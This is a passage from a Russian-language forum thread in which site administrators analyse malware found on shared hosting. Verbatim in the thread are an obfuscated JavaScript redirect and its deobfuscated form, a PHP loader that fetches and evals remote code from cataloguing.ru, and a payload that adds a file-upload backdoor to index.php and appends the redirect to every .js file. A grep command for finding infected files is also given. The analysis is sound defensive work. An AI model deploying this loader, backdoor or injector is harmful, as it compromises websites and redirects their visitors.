header("Content-type: text/html; charset=UTF-8"); // --> Устанавливаем кодировку выводимого текста
echo .. // --> Выводит текст

В результате получаем вот эту страницу:

<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ</title>
    <link href="http://cataloguing.ru/css/panel.css'>http://cataloguing.ru/css/panel.css" rel="stylesheet" type="text/css" media="screen" />
    <link href="http://cataloguing.ru/img/favicon.ico'>http://cataloguing.ru/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
    <script type="text/javascript">createPopup().show( 0, 0, 0, 0, 0 );</script>
</head>
<body oncontextmenu="return false;">
    <div id="main">
        <div id="new"><h1>ПАНЕЛЬ УПРАВЛЕНИЯ</h1><a href="http://cataloguing.ru"><img src="data:image/png;base64,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"></a></div>
        <div id="menu">
            <button onclick="get_data('catalog')">ПРОГОН ПО КАТАЛОГАМ</button>
            <button onclick="get_data('spr')">РЕГИСТРАЦИЯ В СПРАВОЧНИКАХ</button>
            <div id="res">Файл установлен корректно</div>
        </div>
        <div id="links"><a href="#">ТУТ БУДУТ ГЕНЕРИРОВАТЬСЯ ОБРАТНЫЕ ССЫЛКИ, ЕСЛИ БУДЕТ НУЖНО</a></div>
    </div>
    <script src="http://cataloguing.ru/js/panel.min.js"></script>
</body>
</html>

Простая HTML страница. Анализ JS кода не выдал ничего подозрительного.

 

Если же например загрузить страницу по ссылке http://cataloguing.ru/work.txt?q=test, то мы увидим следующее:

header("Content-type: text/xml; charset=UTF-8");echo base64_decode('PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVzdWx0PnRlc3Q8L3Jlc3VsdD4=');

Если расшифровать результат выполнения скрипта выше, то мы получим следующее:

<?xml version="1.0" encoding="UTF-8"?>
<result>test</result>

Как видим то что мы указали в q то и получилось <result> выполнения скрипта.

 

 

Считаю свой моральный долг по анализу кода выполненным. Если что, можете меня дополнить  :)

Riminy likes this

Share this post


Link to post
Share on other sites

Пожалуй, дополню =)

 

Недавно обнаружил странные редиректы на некоторых сайтах на хостинге. Удалось обнаружить вредоносный код в некоторых js-файлах. Код следующий:

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());

После деобфускации этот код принимает следующий вид:

(function() {
    function c(x) { //Возвращает текущий домен из URL вида (zzz.)xxx.yy
        if (x.substr(0, 8) == 'https://') x = x.substr(8);
        if (x.substr(0, 7) == 'http://') x = x.substr(7);
        if (x.substr(0, 4) == 'www.') x = x.substr(4);
        if (x.indexOf('/') != -1) x = x.split('/')[0];
        if (x.indexOf('?') != -1) x = x.split('?')[0];
        return x
    }
    var host = c(window.location.hostname), // Получаем хостнейм из URL (вида xxx.yy)
        ref = c(document.referrer), // То же самое с рефферером
        co = document.cookie, // Получаем куки
        ident = '_y_m_=off', // Уникальная лабуда для куки
        D = new Date(); // Текущая дата
    D.setDate(D.getDate() + 20); // Срок жизни куки - 20 дней
    document.cookie = ident + ';path=/;expires=' + D; // Записываем куки с именем "_y_m_" и содержимым "off", путь - корень, живет 20 дней
    if (ref != '' && ref != host && co.indexOf(ident) == -1) { // Тут интересное. Если рефферер не пустой (!)
        setInterval(function() {							   // Если рефферер не совпадает с хостом (!!!) и если нету куки, то...
            window.location.href = 'http://02o.org/1a'		   // Редирект с задержкой 2 секунды 
        }, 2000)											   // Ссылки разные, это сокращалки URL, ведут на http://y-map.ru/
    }
}());

Соответсвенно, далее просмотр логов выявил, что на одном из сайтов был залит в корень подозрительный файл (залил человек, который имел доступ по фтп) - "1.php". Содержимое файла следущее:

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2NhdGFsb2d1aW5nLnJ1L3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?>

Функция eval() сразу вызывает нехорошее предчувствие :)

После деобфускации:

<?php ini_set('display_errors', 'Off'); // Отключается вывод ошибок
error_reporting('E_ALL');
$b = 'http://cataloguing.ru/work.txt'; // Ссылка на "боевую нагрузку"
$q = $_GET['q']; // Тут получаем параметр "q"
if ($q) $b.= '?q=' . $q; // Если параметр задан, добавляем его к ссылке из переменной $b
$d = file_get_contents($; // Считываем содержимое по ссылке
eval($d); ?> // И передаем полученный код на исполнение

Если переходить по ссылке ""http://cataloguing.ru/work.txt?q=active". Тут самая мякоть. Вместо "панели управления" получем уже конкретную боевую нагрузку:

eval(gzuncompress(base64_decode('eNqVVFFrgzAQ/it7GNjCGFbnhgwf3EMt0nbUDU0zRlFj11HritI5/fXLXcQHlwh7MInc5e6777vLtbd8fnKXL2/aztAfZvzTZzvt3XHLMm4mSVxl93c7lqVfLJto2tWtlpBgn57mcLxQFzbH0aY3A88UDGYAa8Ng9WxYy7+e9ASGvKKhnWfombdsAYeVJO7WsOts42BaWSyMU1ACDph9z29cmBde2EIaD3xO8xY2+op/OjHwZs5vwn6kG2mFZp+jSUWFrRwRxg5hxXg18iEQdujgDAhVVeONyKriyJIxaPyA/Xv7IcMJppiskQsq+EXMsorCTzClZtAoMCz8cyJlo2MeQ2ciA1dxpdCJjcYRfNkF7siV4AmOA67G4oNNoVynmlQxqD7pskjwYb9grTUjA/2QoZVCA3XNXFVwOBNzjcQxV8oM8RF1Yvp77LdTWCfYg74eR7BbhXIOG+bZ5X90QPYMnskMDtgTxUY2PXxy+NT0EwMLZwQmRqFMNzUjE4PdByyIyawk2DguGllHYqwrGs0lKsVCEVgO1AsbdZYUPRWTC6aqm9ycd3Xb4xrtvi2+aMAM8tG9Kf1rMXhXpo+/3ouKkA==')));eval(gzuncompress(base64_decode('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')));eval(gzuncompress(base64_decode('eNqNVE2L2zAQ/SsuhF0PTY1mZEs2rgvtpZeFHnpcUmHSmF1YEsh2DyXkv1cjx6lEGaUGGWTPx5t5b2Z6229/PR/2xYtzqoTTyqnBIbWdNqTqUkH/PJXHw9v+Z6nem6ZV8HH19eHbl88P3x/vHSmL/ih095tHtbkaklEE6+WmO6sBQPLDTblyuF458keHhJIpsakChokxTIRectHBxUdmG1cPkl0dULBNE0cm/qJFr2ZTRsa+yhx6wynqUOQwDNP48roTm2IX2LqovJNcX3vBfT5PEZXoPxrvbf1p4TQdjrtx+yQi6ziILaqolhpgfC049SlTEqpQk2ckSlqHpP155wvMOjPz0j+aA68/LCrCquEDvncRTH/PptCZFPUFO8uJ4qCGSSeRdGwyQc0laE4IGNil0KZFCcXdXSHaB5IJPl17odT8ykxVJ4OkC2s8cywvJosf0R4TmVtYR7cWZHESJY7d3JbrmtCq0tFz6w4/rvuFKtv8+wbINJHCJmB9ktw1qpcZzYwcef6hnxemF0orCoVMUj56uvowJ+PxOP4ukzYiwjw2ufVn03iURvDr592tvULt0oX278YVjTsuVNysKkVzQ/Q6FRE2KXjzH+A1LVvRzMB326eDSLjWaULr8f0BQqa0yg==')));

Деобфусцируем:

<?php function l__0() {  // Функция дописывает в начало файла index.php (который находится рядом с 1.php) вредоносный код для заливки файлов
    $_0 = "index.php";
    if (file_exists($_0)) {
        $_1 = "b3455686wnFsadn54N9FDa.txt";
        copy($_0, $_1);
        $_4 = file_get_contents($_1);
        $_5 = mop;
        $_3 = "<?php if(isset($_FILES['u']) && isset($_POST['n'])) move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>";
        if strpos($_4, $_3) === false) file_put_contents($_0, $_3 . $_4);
        unlink($_1);
    }
}
function l__1($_6, $_7, $_8) { // Рекурсивно перебирает файлы по маске *.js и добавляет в конец тот самый вредоносный код из переменной "$_8"
    foreach (glob($_7 . "/*") as $_4) {
        if (is_dir($_4)) {
            l__1($_6, $_4, $_8);
        } else {
            if (substr(trim($_4), -3) == ".js") {
                if (file_exists(trim($_4))) {
                    $_2 = "";
                    $_2 = file_get_contents(trim($_4));
                    if (strpos($_2, $_8) === false && strlen($_2) > 2000) file_put_contents(trim($_4), $_2 . $_8);
                }
            }
        }
    }
}
ini_set(display_errors, Off);
error_reporting(E_ALL);
ob_start();
l__0(); // Раз
$_8 = "(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());";
l__1(array(), "..", $_8); // Два
ob_end_clean();
header("Content-type: text/xml; charset=UTF-8");
echo '<?xml version="1.0" encoding="UTF-8"?><result>active</result>';

В переменной "$_8" может быть несколько иной код от случая к случаю, там бывают различные "сокращалки URL".

Чтобы выявить зараженные сайты, использовал следующую конструкцию:

find ./ -name '*.js' | xargs grep "xut7ixut" | cut -d: -f1 >> /root/infected.log

Посмотрел по логам - залить через инфицированный index.php ничего не успели. Восстановился из бэкапов. Теоретически, можно всё вычистить скриптом.

 

PS: я не кодер, я админ, мог ошибиться в разборе кода, буду признателен за замечания. Надеюсь, это поможет кому-нибудь...

files, Riminy, shopeq and 1 other like this

Share this post


Link to post
Share on other sites

cyber, все верно. Спалили их окончательно. Могу подтвердить, что заражают они как раз js-файлы сайта, внедряя туда редиректы. Чистил за ними часто за свою практику.

campusboy likes this

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now

  • Recently Browsing   0 members

    No registered users viewing this page.